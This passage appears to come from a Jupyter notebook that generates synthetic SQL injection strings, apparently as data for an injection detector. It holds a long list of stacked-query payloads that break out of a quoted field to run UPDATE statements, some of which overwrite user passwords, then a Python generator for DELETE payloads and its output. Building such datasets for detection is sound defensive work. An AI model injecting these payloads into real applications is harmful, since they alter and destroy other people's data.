 '"; UPDATE customer SET fname = "uBPJv" WHERE email = "hzlVtqu7FBlw"#',
 '"; UPDATE employee SET fname = "MSVG", prefixname = "ejIvE", house_registration = "jzS5TUA7nd", nickname = "LulTZimrN", address = "3AMer", id_card = 1661735134357, work_background = "DQuYa8" WHERE work_background = "KjDvZ28ho"-- ',
 '"; UPDATE customer SET tel = 0922394233, customer_id = "COTI0aC2u", email = "AYWyMuzxALII8nz" WHERE customer_id = "AZM17YK"#',
 '"; UPDATE users SET username = "hkMxmKOEiooZW" WHERE username = "BwbWpZno"#',
 '"; UPDATE employee SET fname = "zxntvNGuV", address = "F90qMfYY", nickname = "SSCODJLspVKd", id_card = 1679463550207 WHERE tel = 0873526452-- ',
 '"; UPDATE employee SET prefixname = "bMpuiIlu", id_card = 1576412361778 WHERE fname = "zUOcakb"# ',
 '"; UPDATE customer SET customer_id = "ZF643PQczqDlZk", lname = "PxaDZqdwcyMB", fname = "MZqWX" WHERE tel = 0891002474# ',
 '"; UPDATE users SET password = "d4qI1qOdvq6B7" WHERE password = "mDxRP4NUZ2piL"-- ',
 '"; UPDATE employee SET tel = 0257878447, email = "bvMiZhC7Gv", address = "8dxw" WHERE address = "frB9X3NejBMp"#',
 '"; UPDATE users SET username = "zmTVSPpyytQuZ" WHERE password = "JqPGOMh5X8kSS"#',
 '"; UPDATE service SET price = 111 WHERE price = 785# ',
 '"; UPDATE customer SET lname = "usGW", customer_id = "zaOu5P9qkG9oK5" WHERE fname = "bCBjIAGT"# ',
 '"; UPDATE employee SET house_registration = "P6DKq7C", fname = "xzUfsZemVaVi", work_background = "OVUWabBtxHhwrvs", lname = "fLwNSbko", email = "0iVaMASq2", id_card = 1808885173029, employee_id = "QO6vG2r62Z3j", address = "E9Rd" WHERE address = "caLVQ9WvXRkPGz"# ',
 '"; UPDATE service SET price = 723 WHERE name = "UqxsZEQv"#',
 '"; UPDATE service SET price = 781 WHERE name = "eIEjP"-- ',
 '"; UPDATE users SET username = "dtiMrJw" WHERE username = "kpCe"#',
 '"; UPDATE service SET price = 014 WHERE price = 451#',
 '"; UPDATE employee SET lname = "PROSMTMhar", id_card = 1575035973670, email = "jMY28", tel = 0121554775, house_registration = "GUex7T" WHERE lname = "iqcEff"-- ',
 '"; UPDATE service SET price = 354 WHERE name = "atbDTLHa"# ',
 '"; UPDATE customer SET email = "zf6FgCz4zWRBl" WHERE email = "qKYjtJGcfU6uID"#',
 '"; UPDATE employee SET fname = "yQcncWSM", email = "tBdC", lname = "dbSLYVTcTZl", tel = 0446158006, house_registration = "d4AOD79InwTHr", id_card = 1968417095920, prefixname = "BNshWtYpRDKlva", nickname = "sTsmjKszKwOH", employee_id = "3Ryimy", work_background = "KlGQnEFFPzFK", graduation_certificate = "4hgFvrF4U" WHERE tel = 0293511590# ',
 '"; UPDATE service SET name = "RvQJjbSqjGIW" WHERE price = 412#',
 '"; UPDATE service SET price = 506 WHERE price = 292# ',
 '"; UPDATE employee SET graduation_certificate = "zZL0hL6n", lname = "yQRfaO", email = "aVe2CCpJ6eqORJ" WHERE email = "NzUp0iiI"#',
 '"; UPDATE users SET password = "XtvO9sBWko1nh" WHERE password = "sisK"# ',
 '"; UPDATE employee SET prefixname = "cAfTfRLbHz", employee_id = "k86v7B", address = "xDSIwx07l3PF", graduation_certificate = "p4ktCPwA", nickname = "VVNLdvq", id_card = 1545054271832 WHERE prefixname = "WJfvDnMaxzqfh"#',
 '"; UPDATE employee SET tel = 0365031694, lname = "wbwxLoi", id_card = 1531360716698, employee_id = "SeEpZxdp4Lv0", nickname = "qPDAQyuTxj", work_background = "mdFGUU3k", address = "XzTTg", graduation_certificate = "PdrUs1QMujrNc" WHERE graduation_certificate = "9NJlod"# ',
 '"; UPDATE employee SET work_background = "tharL91BA", nickname = "zIuOEqwPoBBGpJ" WHERE id_card = 1625533429413-- ',
 '"; UPDATE employee SET tel = 0531271257, house_registration = "ARcW4uWFvy7A", id_card = 1678357488422, address = "C3jwv" WHERE house_registration = "rXz2"#',
 '"; UPDATE employee SET work_background = "J3TOszGbPLOek", tel = 0335152946, employee_id = "KTV9MK0lUJ3ZOh" WHERE lname = "wnnLtifqr"#',
 '"; UPDATE service SET name = "mQBAuDeFa" WHERE name = "WtNeXoAsKCksHl"#',
 '"; UPDATE users SET password = "x8o9e9vQ1JFzu" WHERE username = "esmkrECOMk"#',
 '"; UPDATE service SET name = "JvDBpNUvTDBw" WHERE name = "xqenOAaeZFMW"#',
 '"; UPDATE users SET password = "GOCZbarV" WHERE password = "gHygW7mm4vmfy"-- ',
 '"; UPDATE service SET name = "RjypSdvSaWpT" WHERE name = "EGtI"-- ',
 '"; UPDATE employee SET nickname = "KxGKobtBctsLOE", lname = "stpKeREIDAoVcrP", address = "WzXIm7EdJB", fname = "ZjnhxnXjIggpp", employee_id = "PkV9AEyht3lcy5e", work_background = "yggsh0pk8GVZFO", tel = 0480615827, graduation_certificate = "LfjhAzB", email = "c3ZU" WHERE employee_id = "iDyIKp0V4y"#',
 '"; UPDATE service SET price = 398 WHERE price = 866# ',
 '"; UPDATE customer SET fname = "VmLkgEfMRknEl", tel = 0183499547, lname = "iionAwJZ", customer_id = "C6Wmee" WHERE email = "UbUtCB8Zrwph"# ',
 '"; UPDATE users SET username = "OWIlnEECa" WHERE username = "eUhhUtXXIbWg"-- ',
 '"; UPDATE service SET name = "yQRaDZzquDxx" WHERE price = 977#',
 '"; UPDATE users SET username = "bVFWwsYMUWxdVyP" WHERE username = "gVtzsB"#',
 '"; UPDATE service SET price = 425 WHERE price = 055# ',
 '"; UPDATE users SET username = "XPbApPXUquy" WHERE password = "L3Rh5Cum0ecteW"-- ',
 '"; UPDATE users SET password = "FdXq" WHERE username = "eIuuYUmbaz"# ',
 '"; UPDATE customer SET email = "31q6N7", lname = "trTpbjkRjbCQ", customer_id = "uxLYco1GgY" WHERE tel = 0740184026#',
 '"; UPDATE customer SET fname = "OBBAcRVH", customer_id = "gFDQY", tel = 0346996182 WHERE fname = "kCkToosXn"-- ',
 '"; UPDATE service SET price = 635 WHERE name = "OyXrpxrcSdOFYi"-- ',
 '"; UPDATE employee SET house_registration = "OWdBj", work_background = "56vU", graduation_certificate = "1NTJaUGObM" WHERE lname = "kitXWpr"#',
 '"; UPDATE service SET name = "wDOMdrvGkpV" WHERE name = "rbumAA"#',
 '"; UPDATE employee SET graduation_certificate = "lF3bf", work_background = "S7sKZfPuKlkyS", prefixname = "ZqtyrLdbd", tel = 0765516009, lname = "ynvoozuwUzg" WHERE id_card = 1639951999539#',
 '"; UPDATE users SET username = "bZVBLlUJyAlnGc" WHERE password = "B8J4pJueNBnKb"-- ',
 '"; UPDATE employee SET email = "iwtDf", employee_id = "ri0h0ya61", nickname = "SiVfjxEZ", id_card = 1722881725022, graduation_certificate = "IuKZFftNq3eU", prefixname = "lAGatXOmZKUXZ", work_background = "dj5SRW987YeY", lname = "GtCvXdZCD", fname = "tbXAxQGQxP", house_registration = "CO1urDr", address = "niqMqIFANs6YW" WHERE lname = "ztuvmCzzIZQSAQ"-- ',
 '"; UPDATE customer SET tel = 0882962296, email = "tZRmP1ZlHL8Qr2", customer_id = "Rup9HtwZkox9" WHERE tel = 0854352806#',
 '"; UPDATE customer SET tel = 0666294659, customer_id = "idqC" WHERE tel = 0554920131# ',
 '"; UPDATE customer SET lname = "TCZE", email = "ZXarVgciRon", fname = "LPifkrjj", customer_id = "hemBJL" WHERE lname = "dMDUxdbfQx"-- ',
 '"; UPDATE employee SET graduation_certificate = "3WXM", tel = 0488025944, address = "KVtAtvp5Nl", employee_id = "PPaYPJ1J", email = "d2GUO", lname = "aBpheVCtfmrMt", nickname = "uhNImLmO", house_registration = "3JZCrhwgF8oo", prefixname = "jUFhTDcJ", work_background = "CXBEHWFv" WHERE employee_id = "EH5y"-- ',
 '"; UPDATE users SET username = "kgVysgifomFEbJ" WHERE username = "QMgnkPLRktmS"-- ',
 '"; UPDATE customer SET lname = "AOdsUGYxMRXGn" WHERE fname = "tQMTmMmNshmt"#',
 '"; UPDATE users SET password = "n5GbmGNISxV" WHERE username = "uhxxIZVTKLARz"# ',
 '"; UPDATE users SET username = "WYHSJ" WHERE password = "lyJJ"#',
 '"; UPDATE customer SET customer_id = "pE5NzeA", lname = "AQYELyizZvrAF", email = "i1DYtyHq" WHERE lname = "oGNIH"-- ',
 '"; UPDATE customer SET fname = "gSdAk", lname = "Uizrndp", tel = 0779755729 WHERE fname = "kwbEzkcrLaodj"-- ',
 '"; UPDATE employee SET work_background = "HXuNDl", nickname = "omFhm", lname = "dedRSVuzsYaftud", address = "I6adfgzof1HPW", employee_id = "nN0zHioNzDkILH", prefixname = "EeqDttqKqdfdlcn", tel = 0406080452 WHERE lname = "AbWJHP"# ',
 '"; UPDATE service SET name = "fdpkCLjVp" WHERE price = 402# ',
 '"; UPDATE users SET password = "BUcpZL" WHERE password = "lWpOdUtDX7"#',
 '"; UPDATE users SET username = "oIXucdpHmsIeuOF" WHERE password = "4hFe7XbBlsCWp"#',
 '"; UPDATE customer SET lname = "FHNMMqvD", email = "Rus5SshDgto" WHERE customer_id = "xXkY9s5y"-- ',
 '"; UPDATE users SET password = "c2o9jrT7bsX" WHERE password = "hZDizu3uwu6ue"# ',
 '"; UPDATE service SET name = "vFiJId" WHERE name = "FZFYLqFwkjqeFuC"#',
 '"; UPDATE customer SET customer_id = "EFbU53qz2Q0vmzx" WHERE tel = 0848179775# ',
 '"; UPDATE employee SET nickname = "hmDMKEGvRqUI" WHERE prefixname = "ekVClnG"#',
 '"; UPDATE employee SET fname = "QkuLzceenNQ", employee_id = "7KuIz04tdc3ClWp", lname = "VVgzXNsdPXqoo", address = "Pdo0", graduation_certificate = "LU5HA4MXk06f8XR" WHERE house_registration = "gjiT"#',
 '"; UPDATE users SET password = "KF41" WHERE username = "YPiYhRHfEcZ"# ',
 '"; UPDATE customer SET tel = 0774882314, lname = "ICGmezGXDlwxv" WHERE lname = "dpEKnuvlSCGyE"-- ',
 '"; UPDATE employee SET tel = 0973990031, fname = "DKkJDbXXilv" WHERE address = "YzyYe"#',
 '"; UPDATE users SET username = "VYFR" WHERE username = "gJQELUkp"#',
 '"; UPDATE users SET username = "hFiJu" WHERE username = "otPdkYJSifoo"#',
 '"; UPDATE employee SET id_card = 1773673461860, employee_id = "uv9SZJ9Ip", prefixname = "cTvIHWdux", work_background = "51saDS82wAkK", address = "gakouzb9F5ZJOXi", graduation_certificate = "7L9DqyCxV", tel = 0314588762, nickname = "kPGL" WHERE tel = 0834454909# ',
 '"; UPDATE service SET name = "gszOviLW" WHERE name = "yQCBJUqo"# ',
 '"; UPDATE employee SET prefixname = "DEUd", address = "Z3rxofudz", email = "LFDIeMqzEOOg", id_card = 1781577691006, tel = 0749037631, house_registration = "U8Zlp", nickname = "SogBrKyTMUFeXzJ", lname = "jkMcRLH" WHERE email = "Th552bixZ0y"-- ',
 '"; UPDATE employee SET tel = 0974934927, prefixname = "swgb", graduation_certificate = "xbPkiKaUBT7PZ" WHERE address = "hA883ro2"-- ',
 '"; UPDATE service SET name = "IKWrbBsZw" WHERE price = 707-- ',
 '"; UPDATE customer SET email = "IA1dD", fname = "ItNXTUQrxb", lname = "OSta", tel = 0518118327 WHERE fname = "hCpSV"#',
 '"; UPDATE employee SET work_background = "njMA7jGWNFLpHO", email = "d70h", id_card = 1855631741630 WHERE work_background = "oue6VB6jcQ"#',
 '"; UPDATE employee SET address = "fKyKD6lD", fname = "iuZeBvl", tel = 0842406478, email = "jVMNGTgHgfa", lname = "SikACAKNymBbs" WHERE nickname = "xYpnEKZfkkbUO"#',
 '"; UPDATE users SET username = "tQkVRE" WHERE password = "ZBvfWyiZoFHAqO"-- ',
 '"; UPDATE employee SET house_registration = "MsKr", tel = 0274070703, lname = "FXxfZk", graduation_certificate = "gOajLqQV3hS", employee_id = "hYS2kZJEbhahW", email = "AQvX" WHERE house_registration = "aSLQYEe3lk4mM9"# ',
 '"; UPDATE employee SET nickname = "vaiqt", graduation_certificate = "eVHsUOS", house_registration = "Jn8iqi", employee_id = "OHIQlZ2dkHu1ME", tel = 0123322160, email = "9UOjyKP", id_card = 1970947882144, prefixname = "REDy", work_background = "HFhZG", lname = "xWXtKEwWnepcoPP", fname = "TdrtWL" WHERE fname = "WrcnYL"# ',
 '"; UPDATE customer SET lname = "ObcvUntHHdjClk" WHERE email = "qEkN6aDmK8ou"# ',
 '"; UPDATE employee SET work_background = "jDRLzhDgMj0gj", nickname = "bVMUxzQ", house_registration = "lyCzxkLdjaXAttr", fname = "GanCPpB", graduation_certificate = "DuVsdZm", employee_id = "4ubdur3qCckV", lname = "GYyQhjnatgP", email = "pzAcjN", prefixname = "Npkg", tel = 0123407011, id_card = 1500444422624 WHERE work_background = "JYy3UT9BpoJCf"-- ',
 '"; UPDATE employee SET lname = "xUxxYl", prefixname = "sRsB", work_background = "TXByy", id_card = 1675837433089, address = "mS9hD", fname = "mnTqRU", nickname = "lhAloVYteoTTiy" WHERE address = "n6nbtzdsYS"#',
 '"; UPDATE users SET username = "KWOtVBEeNdVbHTN" WHERE password = "jv46BCf"# ',
 '"; UPDATE customer SET email = "PmkVKvEDAADnd3" WHERE lname = "JsElzQtenyFaH"#',
 '"; UPDATE customer SET customer_id = "ddx4Zp", fname = "htfwn" WHERE tel = 0602189988# ',
 '"; UPDATE users SET username = "UfGktpQ" WHERE username = "hLkafcqKqxb"# ',
 '"; UPDATE service SET price = 542 WHERE price = 577#',
 '"; UPDATE service SET name = "hvjckZGDW" WHERE name = "DCbgjDjUP"# ',
 '"; UPDATE customer SET email = "K8xtCIdtCXfL", customer_id = "rBzUKte5yjHRj1", lname = "vstHamHhtipN" WHERE lname = "ReOs"# ',
 '"; UPDATE customer SET fname = "sxsSVUwbm", lname = "tBeYToQjtO", customer_id = "3pkNjeyt0sX" WHERE lname = "TvCLJbxI"# ',
 '"; UPDATE service SET name = "QCZYJqAdiDYIWY" WHERE price = 773-- ',
 '"; UPDATE users SET password = "QhbyudaBLqdM" WHERE password = "P5GZ0iWQPK"#',
 '"; UPDATE users SET password = "kPJhBN8tTNpi1Ev" WHERE username = "eZzPkG"#',
 '"; UPDATE service SET price = 577 WHERE price = 666#',
 '"; UPDATE users SET password = "uBF8bd1fzy5YS5j" WHERE username = "FoBgjIv"# ',
 '"; UPDATE users SET username = "afArEoVcxyLVtp" WHERE password = "XUujOok4ewPEc"#',
 '"; UPDATE employee SET house_registration = "Vth0YsfcG", prefixname = "crtGYeBPLk", lname = "UGkDdlsz" WHERE fname = "wXDG"# ',
 '"; UPDATE employee SET id_card = 1834033290221, prefixname = "awzuSXmLial", fname = "JmMU", tel = 0903111952 WHERE fname = "eQWeMtd"# ',
 '"; UPDATE service SET price = 273 WHERE price = 346#',
 '"; UPDATE employee SET fname = "wXbNsFO", lname = "lIjZy", prefixname = "jvHRdr", nickname = "yqolgvocrObu", graduation_certificate = "rPCFuZr4jSP", employee_id = "HFazoD9", address = "FfIwm78", work_background = "ZFXl", email = "zXfl79L8F" WHERE house_registration = "1RjBAS1NZ"# ',
 '"; UPDATE users SET password = "LhGrWz2PL9kDyl" WHERE username = "jsUMWb"-- ',
 '"; UPDATE employee SET graduation_certificate = "O0Afm", work_background = "oKfEUt39rDzz", nickname = "EsnItKE", prefixname = "SyTZnOUrvokZA" WHERE id_card = 1712107312991-- ',
 '"; UPDATE users SET password = "jT8D19XddBB" WHERE username = "nPQqpxu"#',
 '"; UPDATE users SET password = "ffiNLz5empNQ" WHERE password = "zOL1N"#',
 '"; UPDATE users SET username = "heVShApTWtvYsxS" WHERE password = "eOXyI8Ly"# ',
 '"; UPDATE users SET password = "Ch4JoRl" WHERE password = "b3azCUpFVzJ"#',
 '"; UPDATE users SET username = "yiYbyQLTfPFujd" WHERE password = "Baf0JVj3fRe"-- ',
 '"; UPDATE employee SET employee_id = "4t4G7K12lR", lname = "csUThQRUpefu", id_card = 1719678814016, house_registration = "VbeQno7Jn7", address = "RZmw", fname = "BltfJsyY" WHERE graduation_certificate = "tPAw9u"-- ',
 '"; UPDATE users SET username = "VRbjxtI" WHERE username = "jxfbFk"# ',
 '"; UPDATE employee SET graduation_certificate = "rlj7Nsie", work_background = "sLaZe", lname = "CFVIgUm", prefixname = "XbBkGmga", tel = 0719865959, email = "Ktsmx4ZIi5rh4IG", address = "TjWE2OG", id_card = 1776995247993, nickname = "TyeNNaKiFJjuq" WHERE lname = "FscnENbfeoI"-- ',
 '"; UPDATE employee SET id_card = 1832181480773, employee_id = "a9bmX1eke0f", graduation_certificate = "yyHcGFqhIOwtz", nickname = "VXlKjnG", prefixname = "scAuQUwn", work_background = "GXeDN", address = "O5wqk3oUSR", lname = "ItbHVoVlUsnHTv", tel = 0579574631, fname = "oAZMyYEuXOWYXg" WHERE id_card = 1876907315128#',
 '"; UPDATE users SET username = "neBRndfoP" WHERE password = "Q1uHX"#',
 '"; UPDATE customer SET lname = "ijUAvOOpzc", fname = "IFutCnGdDZF", tel = 0218613384 WHERE tel = 0251485063# ',
 '"; UPDATE employee SET tel = 0860132505, house_registration = "gcrE", email = "hUrzN3AXLLRbvV" WHERE employee_id = "IUokHbdREAs1a"#',
 '"; UPDATE service SET name = "SsGYfeXgneZyg" WHERE price = 180#',
 '"; UPDATE service SET name = "SpAiAhITc" WHERE price = 713#',
 '"; UPDATE users SET username = "NtGHGbY" WHERE password = "wGPhdHuACiZ"#',
 '"; UPDATE employee SET nickname = "tXDLFuYZdACNSq", tel = 0347768052, employee_id = "HPWbYjLHLiKZ" WHERE nickname = "gwjDeI"# ',
 '"; UPDATE customer SET tel = 0128960042, lname = "ZRawSOlNWA", email = "IDgc", customer_id = "763K" WHERE customer_id = "8f3Ra"# ',
 '"; UPDATE service SET price = 960 WHERE price = 152# ',
 '"; UPDATE users SET username = "qsmIISKuVjnxEAh" WHERE username = "WDecYjkGNXV"# ',
 '"; UPDATE service SET name = "EnhDSajKNBwy" WHERE price = 228-- ',
 '"; UPDATE users SET username = "gTjzaLXgrku" WHERE username = "IhleCUQOh"# ',
 '"; UPDATE employee SET fname = "BeMbS", prefixname = "ynEDUahsLr" WHERE nickname = "zWbgaXAW"-- ',
 '"; UPDATE users SET password = "lMN4iLUM3" WHERE password = "EGaOcfIBXYH"-- ',
 '"; UPDATE users SET username = "FPvA" WHERE password = "7M1EPhxa3kl5E"# ',
 '"; UPDATE service SET price = 960 WHERE name = "nptXblnQY"#',
 '"; UPDATE customer SET tel = 0832860338, email = "yL7YgNQME2p0", fname = "tcnVqnrfou", lname = "nLzzgg" WHERE tel = 0402251634# ',
 '"; UPDATE employee SET nickname = "lUwMPAamC", email = "2Spaq2mqD", house_registration = "qXZPoC9A", work_background = "ZOgNquRhC", employee_id = "Pv4LhyPsouFC" WHERE prefixname = "HFJTCWU"# ',
 '"; UPDATE employee SET house_registration = "AXEimHjg4i2xObK", graduation_certificate = "ANXs3aD", nickname = "lZmcfvm", address = "fxVYAIVrn8TK3SW", prefixname = "iJHP", employee_id = "QKyHUSJfL", fname = "QfXapQRoPEaRkr" WHERE lname = "tiiNxQWkKbdE"#',
 '"; UPDATE users SET password = "WbIqC2tJex" WHERE password = "JQuG"#',
 '"; UPDATE users SET username = "ZdxEmYqeaRiUK" WHERE password = "CzgntxWWe5jK"#',
 '"; UPDATE service SET name = "HisCfDRkZ" WHERE price = 160# ',
 '"; UPDATE service SET price = 370 WHERE price = 126#',

In [47]:
def randomDeleteForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        first = type_of_value[random_table_value]
        if first == "tel":
            random_string = generate_random_string_tel()
        elif first == "price":
            random_string = generate_random_string_price()
        elif first == "id_card":
            random_string = generate_random_string_id_card()
        elif first == "str":
            random_string = generate_random_string_str()
        elif first == "both":
            random_string = generate_random_string_both()
        preStr += '"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + random_last
        # randomOperator = operator[random.randint(0, len(operator)-1)]
        # if (randomOperator) == "":
        #     gen.append('"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + random_last)
        # else:
        #     gen.append('"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + randomOperator)
        #     random_table_value2=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        #     first2 = type_of_value[random_table_value]
        #     if first2 == "tel":
        #         random_string2 = generate_random_string_tel()
        #     elif first2 == "price":
        #         random_string2 = generate_random_string_price()
        #     elif first2 == "id_card":
        #         random_string2 = generate_random_string_id_card()
        #     elif first2 == "str":
        #         random_string2 = generate_random_string_str()
        #     elif first2 == "both":
        #         random_string2 = generate_random_string_both()
        #     gen[i] += random_table_value2 + " = " + random_string2 + random_last
        if preStr in gen:
            continue
        else:
            gen.append(preStr)

    return gen

In [48]:
randomDeleteForSearch(table, table_value, last)

['"; DELETE FROM users WHERE username = "tIXbK"#',
 '"; DELETE FROM service WHERE price = 949-- ',
 '"; DELETE FROM customer WHERE lname = "MCHVYk"#',
 '"; DELETE FROM customer WHERE tel = 0402651288#',
 '"; DELETE FROM users WHERE password = "fR0hPHGLKPd"-- ',
 '"; DELETE FROM users WHERE password = "7YLal8Pv8Hm"-- ',
 '"; DELETE FROM customer WHERE email = "ZnmydI"# ',
 '"; DELETE FROM employee WHERE prefixname = "HcGNpbzHeyrQFfs"# ',
 '"; DELETE FROM customer WHERE email = "uZyL1"#',
 '"; DELETE FROM users WHERE password = "ESuvr3BTCaee"-- ',
 '"; DELETE FROM service WHERE name = "NbkXoqtcDSd"-- ',
 '"; DELETE FROM employee WHERE prefixname = "XhrMJQkoW"# ',
 '"; DELETE FROM employee WHERE nickname = "AmMt"# ',
 '"; DELETE FROM users WHERE username = "csFVULy"# ',
 '"; DELETE FROM users WHERE username = "pTnEtCGUPEfWuz"# ',
 '"; DELETE FROM customer WHERE lname = "llLqVqFsCbPO"-- ',
 '"; DELETE FROM service WHERE name = "IoTwUmCThNA"-- ',
 '"; DELETE FROM employee WHERE work_background = "6m8cJhEqTopUTf"# ',
 '"; DELETE FROM customer WHERE email = "tU8m2jIMIbHNM6"-- ',
 '"; DELETE FROM employee WHERE fname = "gjFgdweKxxUV"#',
 '"; DELETE FROM employee WHERE employee_id = "cDmT"# ',
 '"; DELETE FROM employee WHERE address = "Cu2gHFX7JJ"-- ',
 '"; DELETE FROM service WHERE name = "gckUdEE"#',
 '"; DELETE FROM users WHERE password = "EECozQdBco0q5"-- ',
 '"; DELETE FROM employee WHERE employee_id = "6osli8umTg4gBv"#',
 '"; DELETE FROM service WHERE name = "nBtqUNaOYM"#',
 '"; DELETE FROM employee WHERE prefixname = "VlfwTPNqHKTUVV"#',
 '"; DELETE FROM employee WHERE prefixname = "eTfHpDbGvY"# ',
 '"; DELETE FROM employee WHERE address = "B2QGcmqlhMb6"#',
 '"; DELETE FROM users WHERE username = "latwtKEY"-- ',
 '"; DELETE FROM employee WHERE prefixname = "qvyAqm"-- ',
 '"; DELETE FROM users WHERE password = "xbFLcdLp5"#',
 '"; DELETE FROM customer WHERE fname = "uNEVtUzQsjLJaCD"# ',
 '"; DELETE FROM service WHERE price = 615#',
 '"; DELETE FROM employee WHERE email = "VJ1g6UkcdE"#',
 '"; DELETE FROM employee WHERE work_background = "8JjN"# ',
 '"; DELETE FROM service WHERE name = "WkuZwoDBQEbgw"#',
 '"; DELETE FROM users WHERE username = "nSOhr"# ',
 '"; DELETE FROM customer WHERE fname = "HVIarXmNJyZD"#',
 '"; DELETE FROM customer WHERE lname = "RBunWzhjgrBiNn"-- ',
 '"; DELETE FROM service WHERE price = 558-- ',
 '"; DELETE FROM employee WHERE email = "zaraf98ccAo"-- ',
 '"; DELETE FROM service WHERE price = 343#',
 '"; DELETE FROM customer WHERE customer_id = "bS62Hcqpvyt4Af"#',
 '"; DELETE FROM service WHERE price = 847-- ',
 '"; DELETE FROM employee WHERE lname = "PAyhuAfnwZwG"-- ',
 '"; DELETE FROM service WHERE price = 637-- ',
 '"; DELETE FROM users WHERE password = "Niyj10"#',
 '"; DELETE FROM service WHERE price = 528# ',
 '"; DELETE FROM employee WHERE house_registration = "duwMLnD"-- ',
 '"; DELETE FROM users WHERE password = "cMNOOFEd5pV"#',
 '"; DELETE FROM customer WHERE customer_id = "UUovtGizqPg"# ',
 '"; DELETE FROM customer WHERE fname = "ROmIhDYwtlrBd"-- ',
 '"; DELETE FROM customer WHERE lname = "KFadfwYHbi"#',
 '"; DELETE FROM service WHERE price = 103-- ',
 '"; DELETE FROM customer WHERE customer_id = "TvaV4Fef"-- ',
 '"; DELETE FROM service WHERE name = "PelSv"# ',
 '"; DELETE FROM employee WHERE tel = 0186211877#',
 '"; DELETE FROM customer WHERE email = "a43V"-- ',
 '"; DELETE FROM service WHERE name = "mSdmXlOx"# ',
 '"; DELETE FROM service WHERE price = 948#',
 '"; DELETE FROM users WHERE password = "SjohW"#',
 '"; DELETE FROM employee WHERE address = "0vY43tk6"# ',
 '"; DELETE FROM users WHERE username = "CuBlKEXjk"# ',
 '"; DELETE FROM users WHERE password = "Zp4JYLzE0RdLe8u"-- ',
 '"; DELETE FROM employee WHERE prefixname = "fNcUmcHp"-- ',
 '"; DELETE FROM users WHERE password = "anP0HWC"-- ',
 '"; DELETE FROM service WHERE name = "kBrubxuvZA"#',
 '"; DELETE FROM users WHERE username = "uOHjbl"# ',
 '"; DELETE FROM employee WHERE fname = "NewDguEB"-- ',
 '"; DELETE FROM customer WHERE email = "0RD4gd"-- ',
 '"; DELETE FROM employee WHERE tel = 0379272211-- ',
 '"; DELETE FROM service WHERE price = 059# ',
 '"; DELETE FROM users WHERE password = "RRX7"#',
 '"; DELETE FROM employee WHERE graduation_certificate = "2hFGXwm1"# ',
 '"; DELETE FROM employee WHERE nickname = "HfIDWivsSCVX"#',
 '"; DELETE FROM service WHERE price = 412# ',
 '"; DELETE FROM employee WHERE address = "pxM3WMsSTKOi"# ',
 '"; DELETE FROM employee WHERE tel = 0924474748-- ',
 '"; DELETE FROM service WHERE price = 927# ',
 '"; DELETE FROM employee WHERE email = "rzNir7uwAFvLl"# ',
 '"; DELETE FROM service WHERE price = 082#',
 '"; DELETE FROM service WHERE name = "NCYgLa"-- ',
 '"; DELETE FROM employee WHERE prefixname = "WvPtlZUs"#',
 '"; DELETE FROM users WHERE username = "iwUgxQlF"#',
 '"; DELETE FROM employee WHERE address = "ObJ7YDFEVw"# ',
 '"; DELETE FROM employee WHERE tel = 0655754565# ',
 '"; DELETE FROM users WHERE username = "ZQbsMaBzrx"# ',
 '"; DELETE FROM customer WHERE email = "9cBj"# ',
 '"; DELETE FROM customer WHERE fname = "DjnmVSyzX"#',
 '"; DELETE FROM service WHERE name = "ykOHzo"-- ',
 '"; DELETE FROM customer WHERE email = "hLwVM"-- ',
 '"; DELETE FROM service WHERE price = 325#',
 '"; DELETE FROM service WHERE name = "rLafqyoSftuFPsg"# ',
 '"; DELETE FROM employee WHERE work_background = "PuE6Xw"# ',
 '"; DELETE FROM service WHERE price = 996-- ',
 '"; DELETE FROM customer WHERE customer_id = "MR2CKDxAht"#',
 '"; DELETE FROM customer WHERE fname = "fUansvwbDj"# ',
 '"; DELETE FROM users WHERE username = "wGFrwOEenb"#',
 '"; DELETE FROM employee WHERE id_card = 1687256866527#',
 '"; DELETE FROM service WHERE name = "BCsOWhf"#',
 '"; DELETE FROM users WHERE username = "UJPYmKj"# ',
 '"; DELETE FROM customer WHERE fname = "fgfJAEeRx"# ',
 '"; DELETE FROM users WHERE password = "fBk1kvtkuExM2"-- ',
 '"; DELETE FROM employee WHERE email = "uAqwj6"# ',
 '"; DELETE FROM customer WHERE customer_id = "ZsxeuvHf"# ',
 '"; DELETE FROM users WHERE password = "ByYfoUuoedi3Qx"-- ',
 '"; DELETE FROM service WHERE price = 529# ',
 '"; DELETE FROM employee WHERE address = "1CNWZTB0J0u"# ',
 '"; DELETE FROM customer WHERE customer_id = "nGtKrRm"#',
 '"; DELETE FROM users WHERE username = "KFME"#',
 '"; DELETE FROM users WHERE password = "Xoa5icA28s"# ',
 '"; DELETE FROM employee WHERE nickname = "gxmhmJ"-- ',
 '"; DELETE FROM employee WHERE prefixname = "BikPLmfo"-- ',
 '"; DELETE FROM users WHERE username = "sJrPqjUS"#',
 '"; DELETE FROM service WHERE name = "iEOSUIsySGkX"-- ',
 '"; DELETE FROM service WHERE name = "xwmhQavUvr"#',
 '"; DELETE FROM customer WHERE tel = 0372299397#',
 '"; DELETE FROM users WHERE password = "cADImRvqdWJkC"-- ',
 '"; DELETE FROM employee WHERE nickname = "zkqQenl"-- ',
 '"; DELETE FROM customer WHERE tel = 0904891192#',
 '"; DELETE FROM users WHERE password = "FNOi68gExJ"#',
 '"; DELETE FROM employee WHERE lname = "ZACKnLMZUVXqt"-- ',
 '"; DELETE FROM service WHERE name = "JrxwjDOfAHn"-- ',
 '"; DELETE FROM customer WHERE lname = "xUxKNPlOpvkm"-- ',
 '"; DELETE FROM employee WHERE lname = "cAdhOwEobhBT"#',
 '"; DELETE FROM users WHERE password = "wbrPUsz"# ',
 '"; DELETE FROM service WHERE name = "LgRjH"#',
 '"; DELETE FROM employee WHERE house_registration = "i5lYiQ29TZBAZ9"-- ',
 '"; DELETE FROM employee WHERE nickname = "cYKHFCzILGvCiL"#',
 '"; DELETE FROM users WHERE password = "5YFBuw2q"-- ',
 '"; DELETE FROM employee WHERE address = "DREAb2brME"#',
 '"; DELETE FROM customer WHERE email = "IOkErqqCpU"#',
 '"; DELETE FROM service WHERE price = 110# ',
